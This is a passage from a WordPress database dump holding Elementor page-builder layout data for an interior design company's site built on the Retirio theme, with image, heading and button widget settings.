ion_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3240,4769,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3241,4769,'_elementor_pro_version','3.8.1'),(3249,4647,'_edit_lock','1685010998:2'),(3251,4771,'_wp_page_template','elementor_header_footer'),(3252,4771,'_elementor_edit_mode','builder'),(3253,4771,'_elementor_template_type','wp-page'),(3254,4771,'_elementor_version','3.8.1'),(3255,4771,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\